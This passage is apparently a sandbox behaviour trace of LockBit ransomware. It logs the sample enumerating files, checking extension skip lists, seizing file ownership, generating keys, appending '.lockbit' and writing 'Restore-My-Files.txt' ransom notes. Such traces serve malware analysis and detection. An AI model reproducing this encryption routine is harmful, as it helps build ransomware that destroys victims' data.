(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0077.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0077.052] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.055] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.055] malloc (_Size=0xd0) returned 0x77d800 [0077.055] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xd0, FileInformationClass=0xa) returned 0x0 [0077.055] free (_Block=0x77d800) [0077.055] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.055] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.055] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.056] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x520150, dwReserved1=0x0, cFileName="16to9Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0077.056] lstrcmpiW (lpString1=".", lpString2="16to9Squareframe_VideoInset.png") returned -1 [0077.056] lstrcmpiW (lpString1="..", lpString2="16to9Squareframe_VideoInset.png") returned -1 [0077.056] PathFindExtensionW (pszPath="16to9Squareframe_VideoInset.png") returned=".png" [0077.056] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.056] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.056] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.057] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.057] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.058] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="ntldr", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="bootsect.bak", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="autorun.inf", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="thumbs.db", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] lstrcmpiW (lpString1="iconcache.db", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0077.058] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.058] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned=".png" [0077.058] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.058] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.058] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.058] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.059] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.059] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.059] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.lockbit") returned 84 [0077.059] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.097] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.105] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.105] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.105] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.105] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.105] RtlFreeAnsiString (AnsiString="\\") [0077.105] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0077.105] malloc (_Size=0x200) returned 0x77d800 [0077.106] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.106] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.106] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.106] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.106] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.106] CloseHandle (hObject=0x3b4) returned 1 [0077.107] free (_Block=0x77d800) [0077.107] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.107] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.107] malloc (_Size=0x40068) returned 0x1fb18c0 [0077.107] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3316) returned 1 [0077.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0077.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0077.108] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.110] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.110] malloc (_Size=0xbe) returned 0x77d800 [0077.110] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0077.111] free (_Block=0x77d800) [0077.111] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.111] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.111] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.111] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55, dwReserved0=0x520150, dwReserved1=0x0, cFileName="4to3Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0077.111] lstrcmpiW (lpString1=".", lpString2="4to3Squareframe_Buttongraphic.png") returned -1 [0077.111] lstrcmpiW (lpString1="..", lpString2="4to3Squareframe_Buttongraphic.png") returned -1 [0077.111] PathFindExtensionW (pszPath="4to3Squareframe_Buttongraphic.png") returned=".png" [0077.111] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.111] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.111] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.111] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.111] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.111] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.112] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.112] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.113] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.113] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.113] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.113] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.113] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.113] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="ntldr", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="bootsect.bak", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="autorun.inf", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="thumbs.db", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] lstrcmpiW (lpString1="iconcache.db", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0077.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.113] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned=".png" [0077.114] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.114] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.114] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.114] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.114] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.114] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.114] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.115] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.115] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.115] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.115] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.115] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.lockbit") returned 86 [0077.115] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.115] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.116] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.116] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.116] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.116] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.116] RtlFreeAnsiString (AnsiString="\\") [0077.116] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0077.116] malloc (_Size=0x200) returned 0x77d800 [0077.116] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.116] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.116] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.116] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.117] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.117] CloseHandle (hObject=0x3a0) returned 1 [0077.117] free (_Block=0x77d800) [0077.117] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0077.118] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.118] malloc (_Size=0x40068) returned 0x1ff1e60 [0077.118] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11861) returned 1 [0077.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.118] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0077.118] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0077.119] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.123] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.123] malloc (_Size=0xc2) returned 0x77d800 [0077.123] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0077.123] free (_Block=0x77d800) [0077.124] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.124] 